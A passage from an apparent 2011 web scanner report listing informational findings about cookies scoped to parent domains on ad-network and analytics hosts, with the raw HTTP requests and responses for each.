X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=8239=734250&8144=734251&9621=734251&9234=734252; domain=.interclick.com; expires=Mon, 26-Apr-2021 20:05:54 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Tue, 26 Apr 2011 20:05:54 GMT

GIF89a.............!.......,...........D..;

13.48. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0xJnR5cGU9MSZjb2RlPTYxNyZ0bD0xNTc2ODAw HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/ca.html?ra=8435996260.2377219032496214&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre843599625685&pb=&pc=&pd=&pg=&ct=1303843599626
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:46:40 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451600; domain=pubmatic.com; expires=Fri, 25-Apr-2014 18:46:40 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

13.49. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=unponl_cs=1&betq=8288=401583 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=4579132553189.993?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; BASE=RgwqoyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGAOUajnq9Kr8LAPA72buRiJhbHyGHv70yPsyIf845qx6eWI/QdsmU5nm47UK47HID!; F1=BIaw02E; ROLL=boAno2yqJFBg26I!; C2=wGMtN5pqHIxFG/lovgg3sYMBSKMCItdhwgQ3WXIMIMa4FCDCKGehwgQ3gZIM1qKCaMrxEU7qIEysGCTkBgAoNXUWxOCCsRpBx0I9IsfzFv0i4iQBwWcYw6JCvHpBwVJ9IsuoGH2kQhANZXAcs6OCBMnBwRrcIsNrGAXqHgwzeZAc; GUID=MTMwMzY5MTY5NjsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 26 Apr 2011 18:46:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=HMxtN5pqGIxFGFuovcg3sYkhSK8BItdByeQ3WXgsHMa4FI7BKGeByeQ3gZgs1q6BaMrRGW7qHEysGIbkBcAoNXs2xOyBsRphy2I9HsfzF18i4eQBwW04w65BvHphxXJ9HsuoGN+kQdANZXY8s6+BBMnhxTrcHsNrGGfqHcwzeZY8gCGCvCiBwB; domain=advertising.com; expires=Thu, 25-Apr-2013 18:46:31 GMT; path=/
Set-Cookie: GUID=MTMwMzg0MzU5MTsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Thu, 25-Apr-2013 18:46:31 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 05:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Tue, 26 Apr 2011 19:46:31 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

13.50. http://m.adnxs.com/msftcookiehandler  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=MUID%3dB506C07761D7465D924574124E3C14DF HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChIImdYCEAoYASABKAEw2qLc7QQQ2qLc7QQYAA..; uuid2=2724386019227846218; anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=P#svd:(%iIYUW[ka%F6P9BKUe`h-Uw1UV1'!F+itmDJX'0z[`+B!OOclfZN%p1anmQi))(EM:>@>i!7Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=PhC^:-uCskzysaV/A-^X5ZP0(HqR/y7/szOz6v=Q5EdB:Y(4SBg?:l8]3^OkGzcVI6fs0V6g%Ql]pQKZ'6/+D1O4oOkrL)X*7P(isL#NKe0])kMCmmIm:?dyLUh0@6eKK-*L:%LQc0KPOtwh*#Idv_byR70)hqQJI1A6T+eKm'Df>K'^AQNoC*Ku/Wm=[=`Mr.yZKx/S3(V2`p`XB%9wW6L?].Um<[v:b/tt3[GdP[407fnPbggJ>91*wFE4Oc0>UW_*lP!ZzBgL<J>%P>Exi*J+>[YKqa]%L5w<LiPiP$Z+NL0rQ.D:(=M!)ZgZ<5<oyZpBFibX4C@LtjRT`mDsI1Vk!p#-[^4d`>F:?

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 18:41:02 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:41:02 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Tue, 26 Apr 2011 18:41:02 GMT

GIF89a.............!.......,........@..L..;

13.51. http://m.adnxs.com/tt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /tt

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tt?member=280&inv_code=REAB01&cb=1243611902 HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(Bo3KgX#`c5]qvg^lIg`K'/jYd`<2[cP$Mn.k).`o#?[DvFCmKS]_Rn]AnwyPLgc8R]HmkeLCt7wt+CdMJIY(Q8dnxZw!E9DDGh)[$QnR%ndJcRbu@?$Pk*eA85bgvgm.WQEeO/56q?$4$_+(]sS//QhH(L+o:.t`@]S2kvs7O@m7UZqq?WyPmfoNWxM!.CjYr2V.i

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIImdYCEAoYASABKAEw2qLc7QQQ2qLc7QQYAA..; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=P#svd:(%iIYUW[ka%F6P9BKUe`h-Uw1UV1'!F+itmDJX'0z[`+B!OOclfZN%p1anmQi))(EM:>@>i!7Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=PhC^:-uCskzysaV/A-^X5ZP0(HqR/y7/szOz6v=Q5EdB:Y(4SBg?:l8]3^OkGzcVI6fs0V6g%Ql]pQKZ'6/+D1O4oOkrL)X*7P(isL#NKe0])kMCmmIm:?dyLUh0@6eKK-*L:%LQc0KPOtwh*#Idv_byR70)hqQJI1A6T+eKm'Df>K'^AQNoC*Ku/Wm=[=`Mr.yZKx/S3(V2`p`XB%9wW6L?].Um<[v:b/tt3[GdP[407fnPbggJ>91*wFE4Oc0>UW_*lP!ZzBgL<J>%P>Exi*J+>[YKqa]%L5w<LiPiP$Z+NL0rQ.D:(=M!)ZgZ<5<oyZpBFibX4C@LtjRT`mDsI1Vk!p#-[^4d`>F:?; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Date: Tue, 26 Apr 2011 18:39:22 GMT
Content-Length: 2226

<IFRAME SRC="http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.2
...[SNIP]...

13.52. http://msn.careerbuilder.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.careerbuilder.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home HTTP/1.1
Host: msn.careerbuilder.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 0
Location: http://msn.careerbuilder.com/msn/default.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=fe081d7e64674f419a28ec11735cd32a-357143949-XH-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1B5CE6DB054A3B8D6808870DFF00DA75B99AE633E9DEE927EA50B31042D43B26AD80CE6783B23EC02694EF5309ECC424A; domain=.careerbuilder.com; expires=Thu, 26-Apr-2012 18:39:09 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEARWEB48
Date: Tue, 26 Apr 2011 18:39:08 GMT
Connection: close


13.53. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72142050643632  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omniture.112.2o7.net
Path:   /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72142050643632

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72142050643632?[AQB]&ndh=1&t=26/3/2011%2016%3A15%3A13%202%20300&pageName=Omniture%20Password%20Recovery%20Page&products=%3B&c1=noncustomer&v1=noncustomer&h1=Home//Omniture%20Password%20Recovery%20Page&c2=about%3Ablank&c3=Old%20Site&g=about%3Ablank&s=1920x1200&c=16&j=1.3&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&[AQE] HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: omniture.112.2o7.net
Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9AE00514B5E0-600001538000035D|4DB735BE[CE]; s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9AE00514B5E0-600001538000035F|4DB735BE[CE]; s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9AE00514B5E0-6000015380000361|4DB735BE[CE]; s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9AE00514B5E0-6000015380000363|4DB735BE[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:19:33 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9AE00514B5E0-600001538000035D|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:33 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9AE00514B5E0-600001538000035F|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:33 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9AE00514B5E0-6000015380000361|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:33 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9AE00514B5E0-6000015380000363|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:33 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 21:19:33 GMT
Last-Modified: Wed, 27 Apr 2011 21:19:33 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DB736E5-0644-43C112C6"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www325
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

13.54. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72645798081596  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omniture.112.2o7.net
Path:   /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72645798081596

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72645798081596?[AQB]&ndh=1&t=26/3/2011%2016%3A15%3A20%202%20300&pageName=Omniture%20Password%20Recovery%20Page&products=%3B&c1=noncustomer&v1=noncustomer&h1=Home//Omniture%20Password%20Recovery%20Page&c2=about%3Ablank&c3=Old%20Site&g=about%3Ablank&s=1920x1200&c=16&j=1.3&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&[AQE] HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: omniture.112.2o7.net
Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9AE00514B5E0-600001538000035D|4DB735BE[CE]; s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9AE00514B5E0-600001538000035F|4DB735BE[CE]; s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9AE00514B5E0-6000015380000361|4DB735BE[CE]; s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9AE00514B5E0-6000015380000363|4DB735BE[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:19:40 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9AE00514B5E0-600001538000035D|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:40 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9AE00514B5E0-600001538000035F|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:40 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9AE00514B5E0-6000015380000361|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:40 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9AE00514B5E0-6000015380000363|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:40 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 21:19:40 GMT
Last-Modified: Wed, 27 Apr 2011 21:19:40 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DB736EC-3461-5AAAA36E"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www632
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

13.55. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72918755419910  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omniture.112.2o7.net
Path:   /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72918755419910

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72918755419910?[AQB]&ndh=1&t=26/3/2011%2016%3A14%3A51%202%20300&pageName=support_popup_form&ch=contact&products=contact_us%3Bsupport_popup_form&c1=noncustomer&v1=noncustomer&h1=Home/contact/support_popup_form&c2=about%3Ablank&c3=Old%20Site&g=about%3Ablank&s=1920x1200&c=16&j=1.3&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&[AQE] HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: omniture.112.2o7.net
Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|0-0|4DB735BE[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:19:26 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9B6F0514A7F9-60000166C0045A33|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:26 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9B6F0514A7F9-60000166C0045A35|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:26 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9B6F0514A7F9-60000166C0045A37|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:26 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9B6F0514A7F9-60000166C0045A39|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:26 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 21:19:26 GMT
Last-Modified: Wed, 27 Apr 2011 21:19:26 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DB736DE-4FEF-5A46783B"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www254
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

13.56. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s75575511181236  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omniture.112.2o7.net
Path:   /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s75575511181236

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s75575511181236?[AQB]&ndh=1&t=26/3/2011%2016%3A15%3A17%202%20300&pageName=support_popup_form_success&ch=contact&events=event2&products=contact_us%3Bsupport_popup_form_success&c1=noncustomer&v1=noncustomer&h1=Home/contact/support_popup_form_success&c2=about%3Ablank&c3=Old%20Site&g=about%3Ablank&s=1920x1200&c=16&j=1.3&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&[AQE] HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: omniture.112.2o7.net
Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9AE00514B5E0-600001538000035D|4DB735BE[CE]; s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9AE00514B5E0-600001538000035F|4DB735BE[CE]; s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9AE00514B5E0-6000015380000361|4DB735BE[CE]; s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9AE00514B5E0-6000015380000363|4DB735BE[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:19:34 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9AE00514B5E0-600001538000035D|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:34 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9AE00514B5E0-600001538000035F|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:34 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9AE00514B5E0-6000015380000361|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:34 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9AE00514B5E0-6000015380000363|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:34 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 21:19:34 GMT
Last-Modified: Wed, 27 Apr 2011 21:19:34 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DB736E6-5724-63E34504"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www664
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

13.57. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79267593701483  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omniture.112.2o7.net
Path:   /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79267593701483

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79267593701483?[AQB]&ndh=1&t=26/3/2011%2016%3A15%3A22%202%20300&pageName=policy&ch=privacy&products=%3B&c1=noncustomer&v1=noncustomer&h1=Home/privacy/policy&c2=about%3Ablank&c3=Old%20Site&g=about%3Ablank&s=1920x1200&c=16&j=1.3&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&[AQE] HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: omniture.112.2o7.net
